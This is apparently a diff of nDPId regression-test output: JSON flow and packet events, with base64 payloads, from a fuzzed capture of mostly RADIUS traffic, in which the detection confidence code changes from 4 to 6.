failed","datalink":1,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997664794} 
00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997664564,"pkt":"ABRP+4rqcNuYVcUnCABFAAEwJQBAOfwRT6vG4hk1CgxAHgcUchABHPYEAmEBFD8mC375vqLp+KF9uwm3k4gaCwAAV8gbBVNQQxpuAAABNxA07wUYi7+P\/KZsVS9NJaMwCtVJk9jEkC3Vl7jOtDBnuTtoap5IYaKcg6eQ4RJKJBTY9DYRNNB+ybyX+uSA4d1O4JYyTwpoEtUi2e6DQEAJ+nzQSzAvvoa2HSAJtTQFSW0rq69l6fpVATUwMzExNDgwMDcTwDM4MDcyQHdsYW4ubW5jNDjSLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNzE2L2YwOjc5OjYwOmQxOjdkOjM3LzIyOFkMOTA4JQAhMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJTXIMaNTnLNgc2lqiL9H7Q"} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":175,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997683254} 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":175,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997664564,"pkt":"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"} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1528997683490,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997683490,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA\/1AAPsRUM3G4hk1CgysngcUchAAzV+4C2IAxbjeL+gJ\/Z8y3pAVBW+ilI8BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrTG9yZywgNWIyMmE3MTYvZjA6Nzk6NjA6UjE6NyUAMzcvMjI4T0oBAgBIFwEAAAEFAACeTPrzq4G+qMdV63zS5jgKAgUAANMitQR5aAAATi\/4eqBv42KLAQBzCwUAAI3Vpdgp79asxAN0pnzOl99QEuFioroE6q1umxIDXtaj55s="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997683835,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1528997683835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997683835,"pkt":"AAAMB6xAABRP+4vqCABFAALHIRVAAP8RAAAKDEAexncZNXIQBxQCswAAAWMCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997687969,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -244,22 +244,22 @@ 01328{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1528997764910,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528997764910,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIRtAACUAAAAKDEAexuIZNXIQBxQClwAAAWkCj2WOGagJIQ3h2c\/0kWBqo7IaCgAAV8gOBFVTGgwAalfIyQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqeEATUwMzExNDgwMDcxMzk0MzA0QHdsYW4ubW5jNDgwLm1jY6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1528997774688,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997774688,"pkt":"ABRP+4rqc9uYVcUnCABFAAClBRNAAPwRTvPG6hk1CgxAHgcUchAAkYpBC3AAiTMAZqtMn01XpTgevOOwYPEBNTCyMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMjExLjNncHBuZXR3b3JrLm9yZy4gNWIyMmE3ODYvZTA6NWY6NDU6OTA6MDk6NWYvMjMwTw4BAAAMFwwAAAwBf\/xQEt5biXJtQqmEfDYtwo6O3Ew="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997105304,"flow_last_seen":1528997105304,"flow_idle_time":620000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":88,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997105304,"flow_last_seen":1528997105304,"flow_idle_time":620000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":88,"flow_datalink":1,"flow_max_packets":3} 00580{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997109583,"flow_last_seen":1528997109583,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":254,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00565{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997109583,"flow_last_seen":1528997109583,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":254,"flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997775506,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1528997775506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997775506,"pkt":"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"} 
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997775506,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997775506,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775573,"flow_last_seen":1528997775573,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528997775573,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1528997775573,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528997775573,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBSFAAPwRTuXG4hk1Cgyqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997775762,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1528997775762,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1528997775762,"pkt":"ABRP+4rqcNuYVcUvCABFAADABSVAAPwRTsbG4hk1CgxwHgcUchAArFncA3MApFzr0zNm1cGtfYGqw8gu2esBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMGE3ODQvYjA6OWY6YmE6NGE6MGU6N2UvMjI5EiIzMjc2NCBTdWJzY3JpYmVyIG5rdCBwcm92aXNpb25lZE8HBAEABwBQEol7YUaBxcy8xSb+BSA62Ds="} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997775762,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":200000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997775762,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01364{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1528997777144,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997777144,"pkt":"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\/WrP4cXVwKHtEGPFQc="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection 
failed","datalink":1,"packet_id":214,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997777328} 00714{"packet_event_id":1,"packet_event_name":"packet","packet_id":214,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997777144,"pkt":"ABRP+4rqcNuYVcUnCABFAAEwBTlWAPwRTkLG4hk1CgxAHgcUchABHFtlAnUBFPy\/77suJLORzOzxdqID6lIaCwAAV8gbBVNQQxpuAAABNxA0sgGX0jUZ0GkvrTEvR6JJSI5kjTryeLE5ZDtRZpqfIB5gVwEzf0GZAiOA3v7qRShWEqoRNMrrQ0Ld9EZkDOPTXqYYz\/U0I\/SC+HAlACKylcNORMjkiI8OEYrbS\/uvrFsRUJm7gb3AATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0dyUAay5vcmcsIDViMjJhNzhjL2aqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":218,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997778442} 
@@ -272,32 +272,32 @@ 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":223,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997781611,"pkt":"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"} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1528997829855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997829855,"pkt":"AAAMB6xAABRd+4rqCABFAALbIS5AAP8RAAAKDEAlAOIZNXIQBxQCxwAAAXwCv4IsSQM3nR8wY02\/WtSNjVsaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAF\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"} 
